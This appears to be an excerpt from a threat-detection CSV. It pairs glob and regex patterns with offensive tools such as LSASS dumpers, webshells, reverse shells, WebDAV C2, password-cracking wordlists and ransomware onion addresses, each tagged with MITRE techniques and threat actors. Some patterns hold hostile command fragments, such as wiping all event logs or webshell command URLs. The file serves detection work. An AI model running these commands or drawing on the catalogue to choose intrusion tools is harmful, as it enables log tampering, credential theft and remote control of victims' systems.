"*we.exe -s rssocks -d *",".{0,1000}we\.exe\s\-s\srssocks\s\-d\s.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","62405"
"*weak1337/Alcatraz*",".{0,1000}weak1337\/Alcatraz.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","N/A","10","10","1808","267","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z","62406"
"*weakpass.com/crack-js*",".{0,1000}weakpass\.com\/crack\-js.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","62407"
"*weakpass.com/generate*",".{0,1000}weakpass\.com\/generate.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","62408"
"*weakpass.com/wordlist/*",".{0,1000}weakpass\.com\/wordlist\/.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","62409"
"*weakpass/crack-js*",".{0,1000}weakpass\/crack\-js.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","62410"
"*weakpass_3.7z*",".{0,1000}weakpass_3\.7z.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","62411"
"*weakpass_3a.7z.torrent*",".{0,1000}weakpass_3a\.7z\.torrent.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","62412"
"*weakpass-main.*",".{0,1000}weakpass\-main\..{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","62413"
"*Weaponized JuciyPotato by @decoder_it and @Guitro along with BITS WinRM discovery*",".{0,1000}Weaponized\sJuciyPotato\sby\s\@decoder_it\sand\s\@Guitro\salong\swith\sBITS\sWinRM\sdiscovery.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","N/A","10","10","1697","228","2024-09-04T17:09:30Z","2020-04-12T17:40:03Z","62414"
"*web_cloner/interceptor*",".{0,1000}web_cloner\/interceptor.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","62416"
"*webapi/nemesis_api.py*",".{0,1000}webapi\/nemesis_api\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","62418"
"*WebAuthn proxy running*",".{0,1000}WebAuthn\sproxy\srunning.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003  - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","0","N/A","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","62419"
"*WebBrowserPassView.cfg*",".{0,1000}WebBrowserPassView\.cfg.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","62420"
"*WebBrowserPassView.exe*",".{0,1000}WebBrowserPassView\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","62421"
"*WebBrowserPassView.exe*",".{0,1000}WebBrowserPassView\.exe.{0,1000}","offensive_tool_keyword","webBrowserPassView","WebBrowserPassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 - 11.0). Mozilla Firefox (All Versions). Google Chrome. Safari. and Opera. This tool can be used to recover your lost/forgotten password of any Website. including popular Web sites. like Facebook. Yahoo. Google. and GMail. as long as the password is stored by your Web Browser.","T1003 - T1555 - T1503","TA0006 - TA0007 - TA0009","N/A","Phobos - GoGoogle - 8BASE - Kimsuky - Dispossessor - Loki","Credential Access","https://www.nirsoft.net/utils/web_browser_password.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","62422"
"*WebBrowserPassView.pdb*",".{0,1000}WebBrowserPassView\.pdb.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","62423"
"*WebBrowserPassView.zip*",".{0,1000}WebBrowserPassView\.zip.{0,1000}","offensive_tool_keyword","webBrowserPassView","WebBrowserPassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 - 11.0). Mozilla Firefox (All Versions). Google Chrome. Safari. and Opera. This tool can be used to recover your lost/forgotten password of any Website. including popular Web sites. like Facebook. Yahoo. Google. and GMail. as long as the password is stored by your Web Browser.","T1003 - T1555 - T1503","TA0006 - TA0007 - TA0009","N/A","Phobos - GoGoogle - 8BASE - Kimsuky - Dispossessor - Loki","Credential Access","https://www.nirsoft.net/utils/web_browser_password.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","62424"
"*webcam-capture-0.3.10.jar*",".{0,1000}webcam\-capture\-0\.3\.10\.jar.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","1","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","62425"
"*webcamsnap -v*",".{0,1000}webcamsnap\s\-v.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","62426"
"*webclientservicescanner -dc-ip *",".{0,1000}webclientservicescanner\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","62427"
"*WebDavC2*",".{0,1000}WebDavC2.{0,1000}","offensive_tool_keyword","WebDavC2","WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. and a controller acting as the actuel C2 server.","T1571 - T1210.001 - T1190","TA0003 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Arno0x/WebDavC2","1","0","N/A","N/A","10","10","119","37","2019-08-27T06:51:42Z","2017-09-07T14:00:28Z","62428"
"*webdavC2.py*",".{0,1000}webdavC2\.py.{0,1000}","offensive_tool_keyword","WebDavC2","WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. and a controller acting as the actuel C2 server.","T1571 - T1210.001 - T1190","TA0003 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Arno0x/WebDavC2","1","0","N/A","N/A","10","10","119","37","2019-08-27T06:51:42Z","2017-09-07T14:00:28Z","62429"
"*WebDavC2-master.zip*",".{0,1000}WebDavC2\-master\.zip.{0,1000}","offensive_tool_keyword","WebDavC2","WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. and a controller acting as the actuel C2 server.","T1571 - T1210.001 - T1190","TA0003 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Arno0x/WebDavC2","1","0","N/A","N/A","10","10","119","37","2019-08-27T06:51:42Z","2017-09-07T14:00:28Z","62430"
"*webdavC2server.py*",".{0,1000}webdavC2server\.py.{0,1000}","offensive_tool_keyword","WebDavC2","WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. and a controller acting as the actuel C2 server.","T1571 - T1210.001 - T1190","TA0003 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Arno0x/WebDavC2","1","0","N/A","N/A","10","10","119","37","2019-08-27T06:51:42Z","2017-09-07T14:00:28Z","62431"
"*WebDeveloperSecurityChecklist*",".{0,1000}WebDeveloperSecurityChecklist.{0,1000}","offensive_tool_keyword","WebDeveloperSecurityChecklist","A checklist of important security issues you should consider when creating a web application.can be used by attacker to check wweakness to exploit","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Reconnaissance","https://github.com/virajkulkarni14/WebDeveloperSecurityChecklist","1","0","N/A","N/A","N/A","5","421","58","2021-05-10T07:48:47Z","2017-05-16T20:31:38Z","62432"
"*web-hacking-toolkit.git*",".{0,1000}web\-hacking\-toolkit\.git.{0,1000}","offensive_tool_keyword","web-hacking-toolkit","A web hacking toolkit Docker image with GUI applications support.","T1210 - T1059 - T1105 - T1189 - T1071","TA0001 - TA0002 - TA0011 - TA0005","N/A","N/A","Exploitation tool","https://github.com/signedsecurity/web-hacking-toolkit","1","1","N/A","N/A","N/A","","N/A","","","","62433"
"*webinject64.dll*",".{0,1000}webinject64\.dll.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","62435"
"*Webremote TorCT Client.exe*",".{0,1000}Webremote\sTorCT\sClient\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","62436"
"*webshell http*/tomcatwar.jsp?cmd=*",".{0,1000}webshell\shttp.{0,1000}\/tomcatwar\.jsp\?cmd\=.{0,1000}","offensive_tool_keyword","Spring4Shell","CVE-2022-22965 - CVE-2010-1622 redux","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/DDuarte/springshell-rce-poc","1","0","N/A","N/A","N/A","1","19","12","2023-04-18T14:15:42Z","2022-03-31T08:06:46Z","62437"
"*webshell_execute*",".{0,1000}webshell_execute.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","62438"
"*webshell-exegol.php*",".{0,1000}webshell\-exegol\.php.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","62439"
"*WebSocketReverseShellDotNet*",".{0,1000}WebSocketReverseShellDotNet.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","1","N/A","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z","62440"
"*Wedx765eb Daedx765ta*",".{0,1000}Wedx765eb\sDaedx765ta.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","62441"
"*weevely generate *",".{0,1000}weevely\sgenerate\s.{0,1000}","offensive_tool_keyword","Weevely3","Weevely is a web shell designed for post-exploitation purposes that can be extended over the network at runtime","T1059.003 - T1100 - T1071.001 - T1219 - T1078","TA0002 - TA0003 - TA0005 - TA0011 - TA0008","N/A","Sandworm","Resource Development","https://github.com/epinna/weevely3","1","0","N/A","N/A","8","10","3292","612","2024-10-18T04:32:13Z","2014-09-20T10:16:49Z","62442"
"*weevely generate *.php*",".{0,1000}weevely\sgenerate\s.{0,1000}\.php.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","62443"
"*weevely https://*.php * id*",".{0,1000}weevely\shttps\:\/\/.{0,1000}\.php\s.{0,1000}\sid.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","62444"
"*weg7sdx54bevnvulapqu6bpzwztryeflq3s23tegbmnhkbpqz637f2yd.onion*",".{0,1000}weg7sdx54bevnvulapqu6bpzwztryeflq3s23tegbmnhkbpqz637f2yd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","62445"
"*WELCOME TO MULTI-METHOD LSASS DUMPING TOOL*",".{0,1000}WELCOME\sTO\sMULTI\-METHOD\sLSASS\sDUMPING\sTOOL.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","#content","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","62446"
"*Welcome to OpenBullet 2*",".{0,1000}Welcome\sto\sOpenBullet\s2.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/openbullet/OpenBullet2","1","0","N/A","N/A","10","10","1953","518","2025-03-16T10:50:26Z","2020-04-23T14:04:16Z","62447"
"*Welcome to the Mrvar0x PowerShell Remote Shell!*",".{0,1000}Welcome\sto\sthe\sMrvar0x\sPowerShell\sRemote\sShell!.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/Shell3er","1","0","N/A","N/A","9","10","61","14","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z","62448"
"*Welcome to wso webshell *",".{0,1000}Welcome\sto\swso\swebshell\s.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 ","N/A","EMBER BEAR - Sandworm","Persistence","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#content","N/A","10","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","62449"
"*Welcome! Your are locked by SenSayQ!*",".{0,1000}Welcome!\sYour\sare\slocked\sby\sSenSayQ!.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","62450"
"*wemo2ysyeq6km2nqhcrz63dkdhez3j25yw2nvn7xba2z4h7v7gyrfgid.onion*",".{0,1000}wemo2ysyeq6km2nqhcrz63dkdhez3j25yw2nvn7xba2z4h7v7gyrfgid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","62451"
"*wePWNise*",".{0,1000}wePWNise.{0,1000}","offensive_tool_keyword","wePWNise","wePWNise is proof-of-concept Python script which generates VBA code that can be used in Office macros or templates. It was designed with automation and integration in mind. targeting locked down environment scenarios. The tool enumerates Software Restriction Policies (SRPs) and EMET mitigations and dynamically identifies safe binaries to inject payloads into. wePWNise integrates with existing exploitation frameworks (e.g. Metasploit. Cobalt Strike) and it also accepts any custom payload in raw format.","T1203 - T1059 - T1564.001","TA0002 - TA0003 - TA0007","N/A","N/A","Resource Development","https://github.com/FSecureLABS/wePWNise","1","0","N/A","N/A","N/A","4","353","96","2018-08-27T22:00:25Z","2016-11-09T11:01:11Z","62452"
"*werdhaihai/AtlasReaper*",".{0,1000}werdhaihai\/AtlasReaper.{0,1000}","offensive_tool_keyword","AtlasReaper","A command-line tool for reconnaissance and targeted write operations on Confluence and Jira instances.","T1210.002 - T1078.003 - T1046 ","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://github.com/werdhaihai/AtlasReaper","1","1","N/A","N/A","3","3","255","28","2023-09-14T23:50:33Z","2023-06-24T00:18:41Z","62453"
"*werfault_shtinkering*",".{0,1000}werfault_shtinkering.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","62454"
"*werfault_silent_process_exit*",".{0,1000}werfault_silent_process_exit.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","62455"
"*WerTrigger.exe*",".{0,1000}WerTrigger\.exe.{0,1000}","offensive_tool_keyword","WerTrigger","Weaponizing for privileged file writes bugs with windows problem reporting","T1059.003 - T1055.001 - T1127.001 - T1546.008","TA0002 - TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/sailay1996/WerTrigger","1","1","N/A","N/A","9","3","221","36","2022-05-10T17:36:49Z","2020-05-20T11:27:56Z","62456"
"*WerTrigger-master*",".{0,1000}WerTrigger\-master.{0,1000}","offensive_tool_keyword","WerTrigger","Weaponizing for privileged file writes bugs with windows problem reporting","T1059.003 - T1055.001 - T1127.001 - T1546.008","TA0002 - TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/sailay1996/WerTrigger","1","1","N/A","N/A","9","3","221","36","2022-05-10T17:36:49Z","2020-05-20T11:27:56Z","62457"
"*wesside-ng -*",".{0,1000}wesside\-ng\s\-.{0,1000}","offensive_tool_keyword","aircrack","cracking Wi-Fi security including WEP and WPA/WPA2-PSK encryption","T1078 - T1496 - T1040","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/aircrack-ng/aircrack-ng","1","0","N/A","N/A","5","10","5967","1032","2024-12-19T21:36:56Z","2018-03-10T17:11:11Z","62458"
"*wevtutil el | ForEach-Object {wevtutil cl *",".{0,1000}wevtutil\sel\s\|\sForEach\-Object\s\{wevtutil\scl\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","62461"
"*wevtutil qe security /format:text /q:*Event[System[(EventID=4624)]*find *Source Network Address*",".{0,1000}wevtutil\sqe\ssecurity\s\/format\:text\s\/q\:.{0,1000}Event\[System\[\(EventID\=4624\)\].{0,1000}find\s.{0,1000}Source\sNetwork\sAddress.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","62462"
"*wfencode -*",".{0,1000}wfencode\s\-.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","62507"
"*wfencode -e *",".{0,1000}wfencode\s\-e\s.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","62508"
"*wfencode.bat*",".{0,1000}wfencode\.bat.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","62509"
"*wfencode.py*",".{0,1000}wfencode\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","62510"
"*wfpayload -*",".{0,1000}wfpayload\s\-.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","62511"
